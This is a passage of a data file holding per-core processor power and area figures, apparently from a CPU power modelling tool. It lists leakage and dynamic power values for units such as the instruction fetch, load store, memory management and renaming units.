'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00885632,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0233303,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0946165,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.01842,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.319883,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.32136,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.53349,
'Instruction Fetch Unit/Runtime Dynamic': 0.768047,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0724055,
'L2/Runtime Dynamic': 0.0203402,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 4.43171,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.56223,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.103353,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.103353,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.92175,
'Load Store Unit/Runtime Dynamic': 2.17528,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.25485,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.5097,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0904471,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0915305,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.374203,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0524519,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.689068,
'Memory Management Unit/Runtime Dynamic': 0.143982,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.3673,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0187724,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.195423,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.214196,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.10907,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.236481,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.381434,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.192535,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.81045,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.270466,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.35221,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00991905,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0717274,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0733575,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0717274,
'Execution Unit/Register Files/Runtime Dynamic': 0.0832765,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.15111,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.453276,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.95507,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00196549,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00196549,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00174907,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000697398,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00105379,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00673384,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0175185,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0705204,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.48571,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.237088,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.239519,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 6.92192,
'Instruction Fetch Unit/Runtime Dynamic': 0.57138,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0537837,
'L2/Runtime Dynamic': 0.0145847,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.58563,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.14772,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.07598,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.07598,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.94443,
'Load Store Unit/Runtime Dynamic': 1.5984,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.187354,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.374708,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0664924,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0672969,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.278905,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0388766,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.549236,
'Memory Management Unit/Runtime Dynamic': 0.106174,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.411,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0106693,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.123013,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.133683,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.37929,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.237057,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.382365,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.193005,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.812427,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.271124,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.3535,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00994325,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0719021,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0735364,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0719021,
'Execution Unit/Register Files/Runtime Dynamic': 0.0834797,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.151478,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.451428,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.9554,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00195622,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00195622,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00174089,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000694174,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00105636,
